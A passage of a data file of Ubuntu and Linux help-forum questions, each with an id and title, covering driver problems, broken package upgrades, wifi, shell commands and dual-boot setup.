gl_mesa_pack_invert , gl_mesa_texture_array , gl_mesa_texture_signed_rgba , gl_mesa_window_pos , gl_nv_blend_square , gl_nv_conditional_render , gl_nv_depth_clamp , gl_nv_fog_distance , gl_nv_light_max_exponent , gl_nv_packed_depth_stencil , gl_nv_primitive_restart , gl_nv_texgen_reflection , gl_nv_texture_barrier , gl_nv_texture_env_combine4 , gl_nv_texture_rectangle , gl_oes_egl_image , gl_oes_read_format , gl_s3_s3tc , gl_sgis_generate_mipmap , gl_sgis_texture_border_clamp , gl_sgis_texture_edge_clamp , gl_sgis_texture_lod , gl_sun_multi_draw_arrays when i type glxgears i see the gears spinning . so what is the problem ? hp2000 amd e-450 apu 6300 graphics if there is anything else i need to put tell me . running 64bit ubuntu 13.10 please do not post if you are not sure , i dont want to make things worse than they are : /
434474	a wine videogame console	would a pc-like game console with a single hardware configuration for every unit running wine on top of ubuntu be easier for developers to `` port '' ( more like configure in this case ) games to than existing solutions used to port to linux or valve 's upcoming dx to opengl system ? edit : just wanted to add a few details to avoid confusion i did say ubuntu but it could be any distro really , debian-based is still the most popular so it would be better to used that for compatibility reasons . consider this to be a stop-gap measure to try to lure developers to linux , like some apps that were released by coming pre-configured to run on top of wine from the get-go , and now thanks to sales are being ported to run natively on linux . the steambox got delayed all the way to next year , and i would n't be surprised if many developers are putting any ports on stand-by . getting a game to run on wine is much simpler than porting it , and with a one-configuration software+hardware anyone can contribute to improve a game on wine and it will run the same in any other user 's system .
434476	`` command not found '' when using arithmetic expansion in bash shell	using ubuntu desktop , i have terminal open and i am using the bash shell . one of the shell expansions of bash is the arithmetic expansion , with the following syntax : $ ( ( expression ) ) or $ [ expression ] when i do arithmetic , it does return the correct value but it is always followed by `` command not found '' : $ $ ( ( 1+2 ) ) 3 : command not found $ $ [ 1+2 ] 3 : command not found $ $ [ 2+2 ] 4 : command not found $ $ ( ( 2*6 ) ) 12 : command not found my question is why does it display `` command not found '' and how can i fix that ?
434477	what is vdb partition in this manual	i 'm trying to do this manual as it say here but in the drbd section it says vdb partition that do n't understand what kind of partition is that ? ? ? could any one help ! ! !
434481	usb runtime power management	i am doing the usb runtime power managenet on omap processor . i want power off the usb port if the no usb device is connected to the usb port . if any usb device is connected , the usb port power should be on . this should be done on runtime .
434483	error while creating qcow2 file using qemu-img	when i am creating an qcow2 file using qemu-img command i am getting error as librbd.so.1 file not found . when i check for the dependencies that .so file is present in the /usr/lib folder . can any one solve this issue ?
434485	nautilus does n't mount in xmonad : not authorized to perform operation	i 'm using xmonad as my window manager . in the application nautilus , whenever i try to mount my usb sticks , it shows me the dialog `` not authorized to perform operation . '' i have tried putting this in ~/.xsession file : nautilus -- no-desktop -n & but that does n't work . this is my current ~/.xsession file : # ! /bin/bash gnome-settings-daemon & exec dbus-launch -- exit-with-session xmonad also , when i start a pure gnome session , everything works fine . any idea on how to make nautilus ask password or mount the usb stick on clicking it in the nautilus ?
434488	upgrading from ubuntu 10.10	i have n't upgraded ubuntu in a while and am stuck with ubuntu 10.10 . when i click on upgrade all it says..your version is no longer supported . how do i upgrade then ?
434489	unable to access my local server from outside the domain	i would really appreciate it if you could help me with this . im setting up an internal mail server using zimbra server 8.0.3 and i want people from outside the domain to be able to access this server which is located locally . i have a public ip provided by my isp and i have assigned that ip to one port of the router ( where the link from the isp comes in ) and this server is located behind that cisco router with a public ip 192.168.xxx.xxx . in that router i performed nat port forwarding as seen below so that mail requests from outside will be forwarded to that server . ip nat inside source list 10 interface gigabitethernet0/1 overload ip nat inside source static tcp 192.168.30.254 22 41.59.xx.xx 22 extendable ip nat inside source static udp 192.168.30.254 22 41.59.xx.xx 22 extendable ip nat inside source static tcp 192.168.30.254 25 41.59.xx.xx 25 extendable ip nat inside source static tcp 192.168.30.254 80 41.59.xx.xx 80 extendable ip nat inside source static tcp 192.168.30.254 110 41.59.xx.xx 110 extendable ip nat inside source static tcp 192.168.30.254 143 41.59.xx.xx 143 extendable ip nat inside source static tcp 192.168.30.254 389 41.59.xx.xx 389 extendable ip nat inside source static udp 192.168.30.254 389 41.59.xx.xx 389 extendable ip nat inside source static tcp 192.168.30.254 443 41.59.xx.xx 443 extendable ip nat inside source static tcp 192.168.30.254 993 41.59.xx.xx 993 extendable ip nat inside source static tcp 192.168.30.254 995 41.59.xx.xx 995 extendable ip nat inside source static tcp 192.168.30.254 7025 41.59.xx.xx 7025 extendable after that i change mx and a records of my internet domain mail.example.co.tz to point to that public ip 41.59.xx.xx so that any one accessing that link will be redirected to the public ip and then port forwarded to the mail server . so here comes the problem ... after all that when i access mail.example.co.tz opn a web browser it says unable to connect . am i going wrong somewhere ? ?
434491	how do i create a popup banner before login with cinnamon on ubuntu 13.10 ?	i read the original question `` how do i create a popup banner before login with lightdm ? '' and the answer given there was very good . however , that covers the default `` ubuntu '' session with gdm . how can i adapt that answer to lightdm with the cinnamon session ?
434492	ui problem in ubuntu after give update and run vlc player	i have ubuntu 12.10 in my lenovo g580 machin.i have given update to my system two days before vlc player and other applications are working fine till that date.after that update i ca n't run vlc player in my machine i ca n't see ui of vlc and my os not performing regular actions , i mean it 'll not show any applications close minimize buttons and it 's not showing system menus.if i did n't run vlc then it 's working fine.can anyone help in this ? is this compatibility issue in new version of vlc ?
434493	unable to create `file ' ( while processing ) : read-only file syste	i am trying to update my softwares but i get the following error : the package system is broken check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f the following packages have unmet dependencies : linux-image-generic-lts-quantal : depends : linux-image-3.5.0-45-generic but it is not installed*** after this , i tried installing the package linux-image-3.5.0-45-generic from the software center but i have the same dialog box as above stating that i have unmet dependencies and i need to install the very same package to install itself . $ sudo apt-get install -f [ sudo ] password for shashank : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-image-3.5.0-47-generic linux-image-generic-lts-quantal suggested packages : linux-lts-quantal-doc-3.5.0 linux-lts-quantal-source-3.5.0 linux-lts-quantal-tools linux-headers-3.5.0-47-generic the following new packages will be installed : linux-image-3.5.0-47-generic the following packages will be upgraded : linux-image-generic-lts-quantal 1 upgraded , 1 newly installed , 0 to remove and 103 not upgraded . 4 not fully installed or removed . need to get 0 b/40.8 mb of archives . after this operation , 158 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 224750 files and directories currently installed . ) unpacking linux-image-3.5.0-47-generic ( from ... /linux-image-3.5.0-47-generic_3.5.0-47.71~precise1_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.5.0-47-generic_3.5.0-47.71~precise1_amd64.deb ( -- unpack ) : unable to create `/boot/abi-3.5.0-47-generic.dpkg-new ' ( while processing `./boot/abi-3.5.0-47-generic ' ) : read-only file system dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.5.0-47-generic /boot/vmlinuz-3.5.0-47-generic run-parts : executing /etc/kernel/postrm.d/zz-runlilo 3.5.0-47-generic /boot/vmlinuz-3.5.0-47-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.5.0-47-generic /boot/vmlinuz-3.5.0-47-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.5.0-47-generic_3.5.0-47.71~precise1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and the output of uname -r shows , $ uname -r 3.5.0-44-generic i typed the command sudo mount in terminal and following is the output shashank @ shashank-hp-probook-445-g1 : ~ $ sudo mount /dev/sda6 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda1 on /boot type vfat ( rw , errors=remount-ro ) /dev/sda5 on /home type ext4 ( rw , errors=remount-ro ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/shashank/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=shashank )
434495	blackscreen after installing nvidia drivers	i am running into black screen problems after installing nvidia drivers in my notebook . i have a nvidia mobile 540 but everytime i try installing the driver , i boot to a black screen . only the cursor shows . my notebook has an intel onboard graphic and the nvidia . without the drivers , it burns by watching videos .
434499	avoid initial full directory commit & rather add file to vcs just before modifying the file ?	could i put a certain file in some vcs like git/subversion/etc only `` when '' i am modifying it . so first i put the unmodified version & then the modified version . the desire is to put the file in vcs only when i want , rather than doing initial full directory commits.. is this possible ? i want to version some of the configuration files that i modify on my ubuntu server , but i wish not to do an initial full directory commit , rather i 'm looking if it is possible to a add file to vcs just before i am modifying the file.. how could i achieve this ? i 'm aware of etckeeper but that is only for /etc & it does a initial full directory commit ? why do i do that.. i would rather only want to keep the files i modify & manually manage rather than autocommits at each install .
434500	why runs evolution-calendar-factory ?	why runs evolution-calendar-factory ? here are some processes ( created with ps aux -- forest ) lightdm \_ /usr/bin/x -core :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch \_ lightdm -- session-child 12 31 \_ init -- user \_ ssh-agent \_ dbus-daemon -- fork -- session -- address=unix : abstract=/tmp/dbus-tgrbq6szd8 \_ /usr/lib/evolution/evolution-source-registry \_ /usr/lib/x86_64-linux-gnu/gconf/gconfd-2 \_ /usr/lib/evolution/evolution-calendar-factory afaik i do n't need evolution-calendar-factory . since it takes a lot of ram i do n't want it to run . why is it started ? how to stop it starting the next time ?
434501	what to do after writing source code of ubuntu touch app ?	i have completed the writing of source code for an ubuntu touch app . i created the click package also and installed it . but when i launch it the following error pops up : failed to execute command `` aa-exec-click -p com.ubuntu.developer.karthik.upadya1..myapp_myapp_0.1 -- qmlscene $ @ myapp.qml '' . failed to execute child process `` aa-exec-click '' ( no such file or directory ) how can i go about fixing this error ?
434502	update manager crashes , says it needs 3.2.0.58.69 but linux-image-generic on system is 3.2.0.59.70	recently update manager ceased working . ubuntu software centre , when i enter it instead , offers to repair , then fails and offers to repair again , and so on . this is the key sentence i keep getting and am sick of seeing : linux-generic depends on linux-image-generic ( = 3.2.0.58.69 ) ; however : version of linux-image-generic on system is 3.2.0.59.70 . it makes no sense to me . why would linux need an earlier version than the one installed to update itself ? i am not certain , but it may be that this problem started after attempting to install google chrome . when i checked with synaptic pm , having tried some of the suggested apt commands at the unmet dependencies thread to no avail , it identified linux-generic as broken , tried to update to 3.2.0.60.71 , but then failed again , saying it needed the earlier version ( which synaptic says is installed ) .but that 3.2.0.60.71 is installed instead ! so , it says it needs to upgrade , but then acts like it already has . i have not seen anyone else with precisely ( no pun intended ) this problem on these forums , though someone else unknown has saved virtually the same system response on pastebin here .
434504	authentication required to change user data	i have installed ubuntu 13.01 on a new drive on my computer and all went well until i downloaded skype for linux . when i was asked to install it a window popped up to say `` äuthentication is required to change user data¨ and requests a password . when i type in my password it keeps telling me that the authentication was unsuccessful and i must try again . it also have a ¨details¨ tag that gives the following url under ¨action¨ org.gnome.controlcenter.user-accounts.administration , but this apparently does not exist , but the ¨vendor¨ http : //www.gnome.org/ takes me to the gnome site . i have reset my password and tried all the things i could read up on the web to no avail . please help
434505	how to install gnome desktop on ubuntu 12.04 lts ?	i have ubuntu 12.04 lts and i want to know that of there is a way by which i can have a desktop like this one in the photo : this in not gnome classic . i dont want gnome classic
434510	keyboard layout wo n't reset on new windows - ubuntu 12.04 lts	i have setup the options of keyboard layout as shown in the attached picture . nevertheless , sometimes when i write on my browser in arabic or german , and after that i start a terminal ( or any program for that purpose ) , the keyboard layout remains arabic or german , which could be really really annoying and time wasting before realizing that the layout was n't reset ! anyone knows how to really get the default layout ( english ) to start with every new window ? thank you for any efforts .
434511	how to upgrade mate 1.6 to 1.8 in ubuntu 12.04	i installed mate using the official directions ( http : //wiki.mate-desktop.org/download ) but it installed 1.6 instead of 1.8 . how can i upgrade in ubuntu 12.04 ?
434521	( drm : r600_uvd_init ) *error* uvd not responding , trying to reset the vcpu !	i am using ubuntu for the first time . i installed it in a 100gb partition . each time when i start up ubuntu , i have this error message : [ drm : r600_uvd_init ] *error* uvd not responding , trying to reset the vcpu ! ! ! [ drm : evergreen_startup ] *error* radeon : error initializing uvd ( -1 ) . i searched the internet , but all i found were webpages where a solution is not given explicitly . i am a windows user , so i do n't know very well where to search and what i have to do . i really need to fix this error because i can not use ubuntu - when i try to see a video , the system shuts down immediately . this is important for me because i am trying to learn how to use a program from watching a video tutorial . the hardware of my computer is ( after using lspci -nn | grep vga ) : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 02:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7550m/7570m/7650m ] [ 1002:6841 ] i opened the additional drivers and i found : ati/amd proprietary fglrx graphics drivers ( experimental beta ) . the additional drivers window said that `` the driver is activated but it is not currently using '' . the window just gives me the option to eliminate it . is it better if i eliminate it and install it again ? or should i eliminate it and install a different graphics driver ? the other problem that i have is the sudden shutdown . i think one of the causes is an overheating issue ( when i use windows 8 my laptop did not get overheat as much as it does when i use ubuntu ) . thanks in advance for any help you are able to provide .
434522	xprintidle does n't work in cronjob . why ?	i have lxle ( lubuntu ) 12.04 installed and i spent lots of time looking for working solution to make pc shutdown after some period of idle state . after checking many programs which have n't worked i decided to spend much time of shell script solution run by cronjob i am stuck on 2 problems here . xprintidle does n't give any results ( empty string ) when it is run by cronjob - no matter in crontab file or shell file in those environments it just give empty string instead of number of milliseconds of idle . secondly it seems not simple for me to run my script from crontab for shutdown commend as a root . could you give me a link explaining that topic ? i know only sudo as a user , but script should n't ask for password but just shutdown system .
434523	how can i list last updated packages from terminal ?	after upgrading packages my system is not booting anymore . how can i list last updated packages from terminal in order to revert the changes ? or is there a simpler way to take back latest upgrade ?
434524	linux driver for tplink-wn725n nano wireless adapter	i have recently installed ubuntu 12.04 but can not connect to the net as my wireless adapter has no drivers yet . i found some documentation on it , but i am such a noob i donât know what to do with all this . the adapter is the linux driver for tplink-wn725n nano wireless adapter is there anyone who could explain to me what i have to do with this information ? -- -- https : //github.com/liwei/rpi-rtl8188eu . someone else in another thread mentioned to try : sudo apt-get install linux-backports-modules-cw-3.6-precise-generic but i dont know how i can do that if my machine is offline . can any of this stuff be downloaded on one machine and transfered with a usb disk ?
434525	can sudo be reinstalled after being removed ?	this seems to be a chicken-egg problem . the most common task using sudo is installing and removing software . sudo apt-get purge < appname > but sudo itself can be removed . sudo apt-get purge sudo # do not run this command on production computers ! this is where the fun comes ubuntu @ ubuntu : ~ $ sudo bash : /usr/bin/sudo : no such file or directory although it 's obvious that no person in his right mind will purge sudo ( other than me ) , someone can be fooled to run this command ( not directly , in its hex mode , or whatever it 's called ) or a person could ssh in disguised as tech guru and do the mess . so is there a way of reinstalling sudo ?
434526	continued : samba is installed , why does n't gnome-file-share-properties work ?	the answer given to the original question , on ubuntu saucy , made my personal file sharing options disappear from the unity search tool . initially i installed sudo apt-get install samba system-config-samba cifs-utils winbind to setup file sharing , then came here for the same reason the op gave . after installing sudo apt-get install apache2.2-bin libapache2-mod-dnssd , personal file sharing disappeared from my unity search tool . thus i can not turn on bluetooth file sharing , and whatever was unavailable because of the `` this feature can not be enabled because the required packages are not installed on your system '' message . i 've now uninstalled everything and the 'personal file sharing ' tool is still not showing up . what happened to it ? how do i get it back ?
434534	gaining internet access during installation over xp	i am trying to install over xp . when booted in xp connect wirelessly and it is working . when i enter ubuntu set up there is no connection showing . i 've tried to edit the connection but it is not detecting my wireless . i suspect this may be because the wireless driver ( for ubuntu ? ) is not installed or booted . ( i 'm not an expert ) . how would you advise i proceed ?
434535	ca n't share wifi on dell vostro 2420	my laptop is dell vostro 2420 pdc @ pdc-vostro-2420 ~ $ iwconfig usb0 no wireless extensions . eth0 no wireless extensions . eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . wlan0 is not showing ? i can connect to other wifi . please help
434537	help about sed command	a linux textbook covering sed command gives me an example as follow : sed -e 's/\ ( < [ ^ ] * > \ ) \ ( [ ] *\ ) \ ( < [ ^ ] * > \ ) /\3\2\1/g' gnu linux is cool linux gnu cool is but while i typing exactly the same command as the about one , it shows me : sed -e 's/\ ( < [ ^ ] * > \ ) \ ( [ ] *\ ) \ ( < [ ^ ] * > \ ) /\3\2\1/g' gnu linux is cool gnu linux is cool anyone can help me solve this ? i 'm using ubuntu 12.04lts . many thanks .
434540	can not boot my computer . hard drive is not recognized by bios	i have an asus laptop running windows 8.1 ( k55a-dh51 intel core i5-3210m 2.50ghz - 750gb ) i am completely new to linux and ubuntu . i tried to install ubuntu 13.10 from an usb drive ( i modified my bios so that it would boot from my usb and start the installer ) . everything was going great until the installer did not recognize windows 8 , so i clicked the `` something else '' option in the installer and was presented with a list of partitions ( i believe that 's what they were ) and that is when i decided to quit the installation as i did not know what to do . i then tried to boot to windows , but my computer kept going to my bios . i checked my boot menu and tried to change my boot priority to my hard drive but i did not see that option . i am not sure what to do as i ca n't tell my bios to boot from my hard drive , even when i reset it to it 's defaults settings . please help me ! i have tried multiple things ( including boot-repair , which gave me this : http : //paste.ubuntu.com/7094345/ ) but i am not familiar with linux at all and i do n't understand most of the terms and procedures . i am currently running ubuntu from my usb drive but i want to go back to windows . i do n't want to lose my files so if anyone could help me fix this without formatting my hard drive , that would be really appreciated . i think i just need to to find a way for my bios to recognize my hard drive and tell it to boot from it . please help me ! i am a rookie and really need help .
434541	i want to download ubuntu 14.04	i ca n't wait to download ubuntu 14.04 . when wil it be able to download ? and will i be able to turn on wifi and bluetooth ? please answer
434545	identify duplicate lines in a file without deleting them ?	i have my references as a text file with a long list of entries and each has two ( or more ) fields . the first column is the reference 's url ; the second column is the title which may vary a bit depending on how the entry was made . same for third field which may or may not be present . i want to identify but not remove entries that have the first field ( reference url ) identical . i know about sort -k1,1 -u but that will automatically ( non-interactively ) remove all but the first hit . is there a way to just let me know so i can choose which to retain ? in the extract below of three lines that have the same first field ( http : //unix.stackexchange.com/questions/49569/ ) , i would like to keep line 2 because it has additional tags ( sort , cli ) and delete lines # 1 and # 3 : http : //unix.stackexchange.com/questions/49569/ unique-lines-based-on-the-first-field http : //unix.stackexchange.com/questions/49569/ unique lines based on the first field sort , cli http : //unix.stackexchange.com/questions/49569/ unique lines based on the first field is there a program to help identify such `` duplicates '' ? then , i can manually clean up by personally deleting lines # 1 and # 3 ?
434547	wireless hard block	i have lenovo yoga 2 11 '' with ubuntu 13.10 ( x64 ) . i have just a litle problem with my wifi . ( btw . bluetooth working ) i tried : sudo rfkill list status : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : yes 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : yes 2 : phy0 : wireless lan soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no next : sudo rfkill unblock all sudo rfkill unblock number they work only soft block ... my hard block is still on `` yes '' . my yoga has not hardware button . i tried settings in bios , but not working . if anyone has any other solution i will be very grateful . thank you .
434548	realtek rtl8723ae monitor mode	i have been trying for hours to set my wireless card into monitor mode . it 's a realtek rtl8723ae . the card works fine ; i 'm using it now to post this message . i just ca n't get it to monitor mode . what i have tried so far : $ sudo iwconfig wlan0 mode monitor error for wireless request `` set mode '' ( 8b06 ) : set failed on device wlan0 ; device or resource busy . and then i tried setting it down before setting the mode $ sudo ifconfig wlan0 down $ sudo iwconfig wlan0 mode monitor $ sudo ifconfig wlan0 up $ ifconfig wlan0 link encap : unspec < mac address removed > inet addr:192.168.0.7 bcast:192.168.0.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:1002 errors:0 dropped:5 overruns:0 frame:0 tx packets:208 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:245662 ( 245.6 kb ) tx bytes:36399 ( 36.3 kb ) here is some more output that may be useful : * lspci * 03:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8723ae pcie wireless network adapter [ 10ec:8723 ] subsystem : realtek semiconductor co. , ltd. device [ 10ec:0726 ] kernel driver in use : rtl8723ae 04:00.2 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 0a ) subsystem : clevo/kapok computer device [ 1558:0650 ] kernel driver in use : r8169 * iwconfig * wlan0 ieee 802.11bgn essid : '' greg_the_stop_sign '' mode : managed frequency:2.422 ghz access point : < mac address removed > bit rate=150 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=19/70 signal level=-91 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:10740 missed beacon:0 * rfkill * 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : yes hard blocked : no i 've tried everything i can think of : (
434551	upgrading 13.04 to 13.10 compatibility	i have an amd cpu with radeon graphics card tower . when i tried to install 12.04 and 13.10 using burned disc i had problems with the graphics from the installation phase . 13.04 installed without problems and after the installation i downloaded the catalyst software which improved performance . i was wondering if upgrading to 13.10 using the notification popup that appears at startup is going to mess up the drivers again , or it should be safe ?
434556	how to trim dpkg upgraded packages list	latest upgrade borked my system and i`m trying to revert the last upgrade . i opened my comp with live usb and chrooted to partition that is os installed . i get the upgraded packages with cat /var/log/dpkg.log | grep upgrade > > upgradeddpkg it lists pakages like 2014-03-14 15:31:45 upgrade libprocps0 : i386 1:3.3.3-2ubuntu5.3 1:3.3.3-3 2014-03-14 15:31:52 upgrade libreadline-dev : i386 6.2-9ubuntu1 6.2+dfsg-0.1 2014-03-14 15:31:53 upgrade libreadline6-dev : i386 6.2-9ubuntu1 6.2+dfsg-0.1 2014-03-14 15:31:55 upgrade readline-common : all 6.2-9ubuntu1 6.2+dfsg-0.1 2014-03-14 15:32:25 upgrade libreadline6 : i386 6.2-9ubuntu1 6.2+dfsg-0.1 2014-03-14 15:32:33 upgrade libudev0 : i386 175-0ubuntu19 175-7.2 2014-03-14 15:32:40 upgrade libdevmapper-dev : i386 2:1.02.74-6ubuntu4 2:1.02.74-8 2014-03-14 15:32:42 upgrade libdevmapper-event1.02.1 : i386 2:1.02.74-6ubuntu4 2:1.02.74-8 2014-03-14 15:32:43 upgrade libdevmapper1.02.1 : i386 2:1.02.74-6ubuntu4 2:1.02.74-8 2014-03-14 15:32:44 upgrade dmsetup : i386 2:1.02.74-6ubuntu4 2:1.02.74-8 how can i get only the name of the packages by means of grep , awk or whatever tool ?
434563	ca n't click any window menu after update	i ca n't seem to click any of the menu on any application from the unity panel bar appmenu . working fine before update .
434564	recover overwritten contents of text file	i deleted my file content in the file how can i recover back using timestamps is it possible for ex : i am having the file1.txt cat file1.txt i am linux user i am new to linux i love linux after sometime i later i delete the file content cat file1.txt empty : how to get back the content again in the file
434566	i want to reset every password	i started my ubuntu based laptop after 2 years and now i forgot every single password , when i try to install anything , i am prompted to type authentication password . can any one me ? i want to reset all my passwords . i do n't remember anything .
434570	how to incorporate free space into my root parition ?	so i used to have windows 7 on a dual boot with ubuntu ... windows stopped working , so i deleted it , and now theres just this big thing of free space , i was just wondering , could i just add this to my existing drive for ubuntu intstead of having to mount is whenever i need to use it ? basicaly it just says 201 gb volume on the list of drives , but i just want to put the space on that onto my existing linux drive .
434576	epson v330photo scanner not recognised after installation	i have an epson v330 photo , which until now was running on windows . now iá¸ż trying to install the device on my linux laptop but experience some troubles . well actually no troubles . its just doesnt work : d i dowloaded the drivers from http : //download.ebz.epson.net/dsc/search/01/search/searchmodule like it should be first the iscan-data_1.26.0-1_all.deb file , then the iscan_2.29.3-1~usb0.1.ltdl7_amd64.deb files and in the end the esci-interpreter-perfection-v330_0.2.0-1_amd64.deb file . installed it via terminal without problems . now simplescan and vuescan still didnt recognise the printer . i tried `` sane find scanner '' in terminal with the result : '' found usb scanner ( vendor=0x04b8 [ epson ] , product=0x014a [ epson perfection v37/v370 ] ) at libusb:002:003 # your usb scanner was ( probably ) detected . it may or may not be supported by # sane . try scanimage -l '' then `` scanimage -l '' with the result : '' no scanners were identified '' i restarted the computer after the whole process , still nothing . deleted all the installed files and did it from the beginning again , no difference . has anyone a clue what else i could try ?
434580	uck console/package manager does n't appear	so i opened ubuntu customization kit from the menu , set the preference to `` install packages manually '' , chose ubuntu mini remix iso file , and clicked ok . the terminal window behind started to run its job . it asked me for root password . i waited for minutes , and uck finished building the iso . the problem is , no package manager appeared . i could not `` install package manually '' . i used uck to customize ubuntu studio a few months ago , and everything worked well . but this time , i think something was wrong . what might be wrong ? p.s . : i 'm new here , and i 'm sorry for my bad english : ) oh , i 'm currently using xubuntu 13.10 on an acer aspire one .
434581	problem with ~/.cache/upstart	i 'm not experienced at all with ubuntu yet and i know there are lots of things i have to learn , but i 'm kinda puzzled about this one . i just got ( suddenly after a reboot ) a free disk space warning about only having 17mb of free disk space left . i know i do n't have many things on my home folder - it 's a fresh installation ( installed ubuntu 13.10 only about 2 months ago on my new ssd ) . according to disk usage analyzer there 's a ~/.cache/upstart directory of size 46gb ( out of 50.7gb dedicated to my /home folder ) . after searching there i realised it 's the gnome-session.log file being 46gb big . i have no idea what is this - except from a few things i just read around googling it . i do n't try things that i do n't know how to handle on the specific machine because i do n't want to risk harming it these days , so i do n't really know what should i do now . is it possible that i did something wrong causing it ? is it safe to just delete that /upstart folder to free some disk space , or that could cause me more problems . should i do something else ? sorry if it 's something common but i couldnt find anything clear and reliable to help me . thank you in advance .
434588	ca n't do anything on startup until terminating kate in kubuntu	when my kubuntu starts i ca n't do anything until starting system activity and killing kate . i can not start any program or for example run dolphin file manager . after terminating kate a message is shown : afterwards everything is ok. how may i solve this problem ?
434590	tp link login screen not showing despite connection	i am connected to my tp link router ( tl-wdr3600 ) with three devices ( iphone , macbook , ubuntu pc ) and can use the internet on all of them without any problems . also two of them can access the login screen , except for the ubuntu pc . i tried going to both the ip address and to tplinklogin.net , but the login screen is n't popping up : ( i 'm using a fresh install of ubuntu 12.04 lts .
434591	mining cryptocurrencies with ubuntu and sgminer	what are the steps for setting up a ubuntu machine for mining of crypto-currencies ? i am looking for a full guide to follow - from installing ubuntu to how to config and start the miner itself .
434593	install windows 8 after ubuntu 13.10	i have installed on my laptop ubuntu 13.10 and now , for needs of the job , i have to install alongside ubuntu the windows 8.1 os . my problem is that i have a 640 gb hard disk , non-partioned , and thus i ca n't create the partition needed for the installation of windows . i need to have these two operating systems together on my laptop without removing ubuntu . does anyone know how to solve my problem ?
434598	may i install ubuntu and debian sharing the same swap memory ?	i want to install debian and ubuntu in the same disk with different partitions . i also have a windows partition . the question is if i could install ubuntu and debian sharing the same swap memory or instead i need to have one swap partition for each installation . has anyone tried this ?
434600	connecting to a projector with hdmi ?	i have a hp envy m6 with amd a-10 and amd radeon hd 8610g . i have installed the propriety amd drivers . but i am unable to connect to the projector using hdmi . nothing happens when i connect to the projector . on opening amd catalyst i can see the projector option but it does not display on the projector .
434603	where are the programs on my hard drive ?	i created a partition on my hard drive just for ubuntu , but when i install something from the ubuntu software center where is this program located ? i mean , it 's on the partition , but where is it located in the filesystem ! someone help .
434617	youtube-dl problem	my ubuntu is showing me this error : abhishek @ abhishek-thinkpad-r61 : ~ $ youtube-dl -f worst http : //www.youtube.com/watch ? v=qghx-u-c5cg [ youtube ] setting language warning : unable to set language : nonnumeric port : 'port_no' [ youtube ] qghx-u-c5cg : downloading video webpage error : unable to download video webpage : nonnumeric port : 'port_no' abhishek @ abhishek-thinkpad-r61 : ~ $
434625	kernel compiling question about `` .config '' file	i am in the middle of compiling a new linux kernel targeted at my acer aspire one laptop with an intel atom processor . i 'm just playing as a self teach exercise . so far , i have made my new config , using my original config as a reference and have saved my new config as `` .config '' in the linux kernel source code directory . ( i have also backed up my new config for future playing ) . still in this directory , i am compiling the kernel as we speak using the command : '' fakeroot make-kpkg -- initrd kernel-image kernel-headers '' my question is this . is the new kernel definately being compiled against my newly created .config file , or am i meant to specify this in the command ?
434626	can i run 64 bit apps in 32 bit linux ?	there are some proprietary apps that are being provided only in 64-bit version .
434628	which application does the vi command open ?	when you type vi in the terminal , the following output is shown ~ vim - vi improved ~ ~ version 7.3.547 ~ by bram moolenaar et al . ~ modified by pkg-vim-maintainers @ lists.alioth.debian.org ~ vim is open source and freely distributable ~ ~ help poor children in uganda ! so according to this , vi must be launching vim . but when you type vim it gives aditya @ aditya-desktop : ~ $ vim the program 'vim ' can be found in the following packages : * vim * vim-gnome * vim-tiny * vim-athena * vim-gtk * vim-nox try : sudo apt-get install < selected package > this shows that vim is not installed . notably man vi and man vim launch the same man pages . so what does the vi command actually launch ?
434630	is there a way to get multiple monitors to work on nvidia geforce gtx 765m in 13.10	i recently installed ubuntu 13.10 on an msi gs70 with an nvidia geforce gtx 765m graphics card . since installation i have been unable to get the machine to recognize an additional monitor either from the built in hdmi port or either of the built in display port connections . it used to be i could install the nvidia drivers then use the nvidia settings tools to discover and configure extra monitors . now the nvidia xserver settings tool does n't seem to have a displays section any more . any hints on where this functionality went ?
